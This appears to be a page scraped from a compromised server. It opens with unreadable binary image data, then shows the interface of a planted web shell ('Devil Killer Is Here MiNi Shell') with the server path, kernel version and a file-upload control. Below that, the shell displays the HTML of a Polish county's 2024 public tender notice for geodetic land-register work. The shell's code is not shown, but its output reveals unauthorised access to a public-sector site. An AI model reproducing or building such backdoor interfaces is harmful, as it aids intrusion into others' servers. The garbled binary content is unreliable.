JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241004/0053132801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Na wyk. dok. geodezyjnej, na podst. której nastąpi dost. bazy danych ewidencji gruntów i budynków do obowiąz. przepisów prawa w zakresie powierzchni działek ewidencyjnych dla powiatu krotoszyńskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Krotoszyński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854754</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">56 Pułku Piechoty Wlkp. 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krotoszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">62 725-42-56</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@starostwo.krotoszyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-krotoszyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Na wyk. dok. geodezyjnej, na podst. której nastąpi dost. bazy danych ewidencji gruntów i budynków do obowiąz. przepisów prawa w zakresie powierzchni działek ewidencyjnych dla powiatu krotoszyńskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f62496c7-12ef-4d0c-9b26-c5ce65af0d88</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00531328</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00054519/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Wyk. dok. geodezyjnej na podst. której nastapi dostos. bazy danych ewid. gruntów i budynków do obowiąz. przepisów w zakres. powierz. działek ewidencyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_krotoszyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_krotoszyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia,o których mowa w<br/>art. 125 ust. 1 p.z.p. podmiotowe środki dowodowe, pełnomocnictwa, sporządza się w postaci elektronicznej, w ogólnie dostępnych<br/>formatach danych. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2<br/>do“Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej<br/>Rozporządzeniem KRI. Zamawiający rekomenduje formaty .pdf.doc .docx .xls .xlsx .jpg (.jpeg), ze szczególnym wskazaniem na .pdf.<br/>Ofertę, a także oświadczenia o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym. W postępowaniu o udzielenie zamówienia korespondencja (inna niż oferta Wykonawcy i załączniki do oferty)<br/>odbywa się elektronicznie za pośrednictwem platformy zakupowej pod adresem:https://platformazakupowa.pl/pn/powiat_krotoszyn i<br/>formularza „Wyślij wiadomość do Zamawiającego”znajdującego się na stronie danego postępowania. Za datę przekazania (wpływu)<br/>wniosków,zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku<br/>„Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:1) akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz<br/>uznaje go za wiążący, 2) zapoznał i stosuje się do Instrukcji składania ofert dostępnej https://platformazakupowa.pl/strona/45-<br/>instrukcje6. wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: 1) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji:pamięć min. 2<br/>GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,3) zainstalowana dowolna przegladarka internetowa inna niż Internet Explorer ,4) włączona obsługa<br/>JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,6) Szyfrowanie na<br/>platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3 7) Oznaczenie czasu odbioru danych przez platformę zakupową<br/>stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar. Z uwagi na ograniczone możliwości techniczne niniejszej platformy szczegółowe informacje zostały zawarte w<br/>Rozdziale 24 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozporządzenia parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE – zwanego dalej RODO informuję, że:<br/>1. Administratorem danych osobowych jest: Starosta Krotoszyński kontakt: Starostwo Powiatowe z siedzibą ul. 56 Pułku Piechoty<br/>Wlkp. 10, 63-700 Krotoszyn tel. 62 725-42-56, e-mail starosta@krotoszyn.pl,<br/>2. Inspektorem ochrony danych jest: Mikołaj Lechman, Starostwo Powiatowe w Krotoszynie, ul. 56 Pułku Piechoty Wlkp. 10, 63-700<br/>Krotoszyn, e-mail: iod@starostwo.krotoszyn.pl, tel. 62 725-42-56 wew. 354, e-mail: iod@starostwo.krotoszyn.pl<br/>3. Cel przetwarzania danych osobowych: Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego oraz w związku z archiwizowaniem dokumentów zgromadzonych w przedmiotowym<br/>postępowaniu, w tym przekazanie dokumentów/nośników danych do archiwum zakładowego.<br/>4. Podstawa prawna przetwarzania danych:<br/>1) art. 6 ust. 1 lit b i c RODO;<br/>2) ustawa Prawo zamówień publicznych zwanej dalej pzp;<br/>5. Odbiorca danych - dane osobowe mogą być przekazane:<br/>1) osobom i podmiotom uprawnionym i upoważnionym na podstawie przepisów prawa, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o przepisy ustawy z dnia 11 września 20219 r. – Prawo zamówień publicznych;<br/>2) podmiotom świadczącym usługi doręczania pism;<br/>3) dostawcom usług teleinformatycznych, którym zlecono usługi związane z przetwarzaniem danych osobowych.<br/>6. Czas przetwarzania:<br/>1) dane osobowe osób, podmiotów będą przechowywane, zgodnie z art. 78 ust. 1 ustawy pzp, przez okres 4 lat od dnia zakończenia<br/>Ogłoszenie nr 2024/BZP 00501566/01 z dnia 2024-09-16<br/>2024-09-16 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>postępowania o udzielenie zamówienia,<br/>2) dane osobowe osób, podmiotów z którymi została zawarta umowa, a czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy.<br/>3) oraz nie krócej niż przez okres przewidziany w instrukcji kancelaryjnej, stanowiącej załącznik do rozporządzenia Prezesa Rady<br/>Ministrów z dnia 18 stycznia 2011 w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt, instrukcji w sprawie<br/>organizacji i zakresu działania archiwów zakładowych oraz umów o dofinansowanie (jeżeli dotyczy).<br/>7. Prawo osób, podmiotów, których dane dotyczą:<br/>1) mają prawo dostępu do swoich danych osobowych, ich sprostowania, lub ograniczenia przetwarzania.<br/>2) nie mają prawa w związku z art. 17 ust. 3 lit. b, d lub e RODO do usunięcia danych osobowych; prawa do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;, na podstawie art. 21 RODO prawa sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. b i c RODO<br/>8. Prawo do wniesienia skargi: Osoba, podmiot, której dane dotyczą ma prawo do wniesienia skargi do organu nadzorczego<br/>zajmującego się ochroną danych osobowych tj. Prezesa Urzędu Ochrony Danych Osobowych, w przypadku, gdy dane osobowe<br/>przetwarzane są niezgodnie z przepisami prawa.<br/>9. Wymóg podania danych: Osoba, podmiot będący uczestnikiem postępowania jest zobowiązany do podania swoich danych<br/>osobowych. Powyższe wynika z obowiązku ustawowego określonego w przepisach ustawy Prawo zamówień publicznych,<br/>związanego z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania danych osoby, podmiotu<br/>będących uczestnikami w postępowaniu wynikają z ustawy pzp.<br/>10. Profilowanie danych: Dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>11. Cel inny: Dane osobowe nie będą przetwarzane w innym celu niż zostały pobrane</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż w związku z:1) art. 19 ust. 2i3ustawy z dnia 11 września<br/>2019r. Prawo zamówień publicznych:- skorzystanie przez osobę,której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa wart.16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą,-w postępowaniu<br/>o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.2) art. 75 ustawy z dnia 11września 2019<br/>r. Prawo zamówień publicznych: - w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez<br/>zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3rozporządzenia2016/679,zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.272.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: wykonanie dokumentacji geodezyjnej, na podstawie której nastąpi dostosowanie bazy<br/>danych ewidencji gruntów i budynków do obowiązujących przepisów prawa w zakresie powierzchni działek ewidencyjnych<br/>dla powiatu krotoszyńskiego.<br/>2. W ramach usługi będącej przedmiotem zamówienia wykonawca zobowiązany jest do wykonania dokumentacji<br/>geodezyjnej, na podstawie której nastąpi dostosowanie bazy danych ewidencji gruntów i budynków do obowiązujących<br/>przepisów prawa w zakresie powierzchni działek ewidencyjnych w postaci:<br/>1) Zbiorów nowych, zmodyfikowanych lub zweryfikowanych danych, które należą do zakresu informacyjnego bazy danych<br/>ewidencji gruntów i budynków,<br/>2) Dokumentów wymaganych przepisami prawa wydanymi na podstawie art. 19 ust. 1 pkt 11 ustawy Prawo geodezyjne i<br/>kartograficzne.<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik Nr 1 do SWZ – opis przedmiotu zamówienia.<br/>3. Wymagany minimalny okres gwarancji na wykonane prace i wykonane materiały wynosi 24 miesiące od daty<br/>bezusterkowego odbioru końcowego.<br/>Jednym z kryteriów oceny ofert jest okres na jaki Wykonawca wydłuży gwarancję. Dokładny okres gwarancji określony<br/>zostanie po wyborze oferty przedstawiającej najkorzystniejszy bilans kryteriów oceny ofert tj. ceny, oraz wydłużenia<br/>gwarancji.<br/>4. W okresie gwarancji Wykonawca na własny koszt i ryzyko zobowiązany będzie do<br/>1) Nieodpłatnego usuwania stwierdzonych wad i usterek powstałych z przyczyn, za które odpowiada Wykonawca,<br/>2) Nieodpłatnego usunięcia wszystkich wad i usterek wskazanych przez Zamawiającego.<br/>Ogłoszenie nr 2024/BZP 00501566/01 z dnia 2024-09-16<br/>2024-09-16 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Wykonawca zobowiązany będzie dokonać usunięcia wad i usterek przy zachowaniu wytycznych wynikających z niniejszej<br/>umowy oraz SWZ wraz z załącznikami z uwzględnieniem ewentualnych zmian w przepisach prawa.<br/>5. W razie stwierdzenia w czasie odbioru lub w okresie gwarancji wad, powstałych z przyczyn, za które odpowiada<br/>Wykonawca, nie nadających się do usunięcia, a wady te uniemożliwiają użytkowanie przedmiotu umowy zgodnie z jego<br/>przeznaczeniem - Zamawiający może odstąpić od umowy, lub żądać wykonania umowy po raz drugi na koszt wykonawcy, a<br/>Wykonawca naprawi na koszt własny szkody poniesione przez Zamawiającego.<br/>6. W celu wypełnienia obowiązków wynikających z ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach<br/>alternatywnych Wykonawca zobowiązuje się zapewnić udział pojazdów elektrycznych lub pojazdów napędzanych gazem<br/>ziemnym we flocie użytkowanych pojazdów przy wykonywaniu zamówienia w wysokości wynikającej z art. 68 ust. 3 w<br/>związku z art. 36 a ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych i ewentualnych jej<br/>zmianach. W przypadku zmiany ustawy w zakresie terminu zapewnienia udziału pojazdów elektrycznych lub pojazdów<br/>napędzanych gazem ziemnym, wymagania w zakresie elektromobilności określone w umowie stosuje się z uwzględnieniem<br/>zmian ustawy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71354300-7 - Usługi badań katastralnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72300000-8 - Usługi w zakresie danych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oceny ofert zamawiający dokona na podstawie dokumentów, oświadczeń składanych wraz z ofertą<br/>oraz kryteriów oceny ofert wskazanych w SWZ. Za najkorzystniejszą zostanie uznana oferta nieodrzucona, która uzyska najwyższą<br/>łączną liczbę punktów w kryteriach oceny ofert z uwzględnieniem zapisów ustawy pzp w zakresie uzupełniania, wyjaśniania<br/>dokumentów , oświadczeń wyjaśniania treści ofert, poprawa omyłek, wyjaśnień w zakresie wyliczenia ceny (rażąco niska cena). 2. W<br/>sytuacji, jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny<br/>lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w<br/>kryterium o najwyższej wadze.3. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera<br/>ofertę z najniższą ceną . 4. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 3, zamawiający wzywa<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających<br/>nową cenę.5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych<br/>przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w<br/>terminie wskazanym przez Zamawiającego. 6. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania z ofertą<br/>określonym w SWZ. 7.W przypadku gdy wybór najkorzystniejszej oferty nie nastąpi przed upływem terminu związania ofertą<br/>określonego w dokumentach zamówienia, zamawiający przed upływem terminu związania ofertą zwraca się jednokrotnie do<br/>wykonawców o wyrażenie zgody na przedłużenie tego terminu o wskazywany przez niego okres, nie dłuższy niż 30 dni.8.<br/>Przedłużenie terminu związania ofertą, o którym mowa w ust. 7, wymaga złożenia przez wykonawcę pisemnego oświadczenia o<br/>wyrażeniu zgody na przedłużenie terminu związania ofertą.9. Jeżeli termin związania ofertą upłynie przed wyborem<br/>najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę̨, którego oferta otrzymała najwyższą ocenę̨, do wyrażenia, w<br/>wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty. 10. W przypadku braku zgody, o której mowa w<br/>ust. 9, oferta podlega odrzuceniu, a Zamawiający zwraca się̨ o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta<br/>została najwyżej oceniona, chyba że zachodzą̨ przesłanki do unieważnienia postępowania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności techniczne lub zawodowe<br/>Zamawiający uzna spełnienie przedmiotowego warunku jeżeli: Wykonawca przedłoży wykaz osób, które będą uczestniczyć<br/>w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie<br/>do dysponowania tymi osobami. Wykaz powinien potwierdzać dysponowanie, co najmniej jedną osobą posiadającą<br/>uprawnienia geodezyjne w zakresie 1 i 2 tj.: geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i 